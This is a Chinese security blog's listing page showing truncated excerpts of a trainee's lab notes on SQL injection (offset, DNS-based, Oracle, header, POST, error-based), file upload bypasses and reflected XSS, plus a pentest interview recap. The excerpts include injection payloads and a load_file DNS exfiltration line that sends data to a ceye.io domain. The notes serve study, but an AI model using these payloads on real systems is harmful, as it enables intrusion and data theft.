Track 实习学员

小矿工

4关注
1粉丝
24文章
返回网站首页

您已发布 24篇文章作品写文章

杭州某科技公司 /渗透测试岗/励志篇/面试经验分享

这不算经验,但可以励志所面试的公司:某公司薪资待遇:7k-12k 、双休所在城市:杭州面试职位:渗透测试面试过程:hr看了我的简历直接技术面,简历照抄老师上课说的面试问题:只记住一些问题渗透测试流程:(打算长篇大论的结果只有详细说真实ip如何探测他就问其他的了)sql过滤单引号怎么注入:编码绕过宽字节是什么原理:(这个课上说过的吧啦吧啦)csrf和ssrf区别 和 作用:(ssrf的作用我只记得内

 2019-5-21
 0 
 6584 

Access注入--偏移注入

偏移注入使用场景:  sql注入的时候--无法查询列名 :如 系统自带数据库的权限不够而无法访问系统自带库 前提:知道表名 (可以猜) table_name.*  表中所以字段的意思偏移注入步骤:1,判断注入点2,order by 判断长度3.判断表名4.联合查询5.获取表中列数(知道存在几列以及输出点)6.开始偏移注入靶场:get请求有过滤,尝试cooki

 2019-4-25
 0 
 171 

文件上传解析漏洞 二 11-19

11.%00截断:0x00是一个六进制表示方式,表示ascil码值为0,有些函数处理这个字符会当做结束上传之后会重命名,用%00在文件名后面截断12.%00截断绕过二:因为是Post传参13.图片码绕过:直接上传.jpg图片码14.getimagesize图片类型绕过:用cmd 合成图片码就可以了15.php_exif模块图片类型绕过:同上16:二次渲染:同上17:条件竞争绕过:上传一个php然后

 2019-1-20
 0 
 40 

文件上传解析漏洞 1-10

1.属于前端验证可以上传.jpg|.png|.gif 然后抓包,修改成.php2.属于Content-Type绕过,把Content-Type的值改成image/jpeg,就行了3.黑明单绕过,可以上传php3,php4,php5,phtml,jspx,jspf,asa,cer,aspx,exe,exee4..htaccess文件绕过:指令代码:AddType application/x-http

 2019-1-20
 0 
 21 

反射型xss

反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。攻击方式:攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞 见框就插 <script>alert'xss'

 2019-1-15
 0 
 5 

DNS注入 靶场笔记

注入函数解析:load_file原本是读取文件返回文件内容为字符串(需要使用此函数一般为root)这个函数还可以用来发送dns请求.load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\abc'))concat 为字符串拼接,\是转意,.xxx.ceye.io是平台的域名 abc 是共享文件夹靶场存在w

 2019-1-8
 0 
 21 

oracle注入 靶场笔记

在url地址栏输入:?id=1'数据库报错,判断是oracle ,用报错注入查当前表名:?id=1' and 1 =ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))--排除admin表查看下一个表:?id=1' and 1 =ctxsys.drithsx.sn(1,(select

 2019-1-8
 0 
 13 

header 注入 靶场笔记

原理 php 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。$_SERVER(包含了诸如头信息(headr),路径(path),以及脚本位置(script locations)等等信息的数组)updatexml() 更新xml文档的函数语法:updatexml(目标xml文档,xml路径,更新的内容)updatexml(1,concat(0x7e,(select

 2018-12-20
 0 
 37 

POST注入 靶场笔记

Post输入万能密码看看能否登录 ' or 1=1 # 发现语句执行正常输入:'or 1=2 # 数据库报错存在注入点,然后猜字段  ' or 1=1  order by 2#联合查询判断显示位 ' union select 1,2#查数据库' union select 1,database() #' union sel

 2018-12-19
 0 
 49 

显错注入 靶场笔记

第一题用id=1' 判断有没有显示位发现报错,可以注入然后就 ?id=1' order by 3--+?id=1' union select 1,2,3 limit 1,1--+//判断显示位?id=1' union select 1,2,database() limit 1,1--+//判断数据库?id=0' union select 1,2,t

 2018-12-19
 0 
 13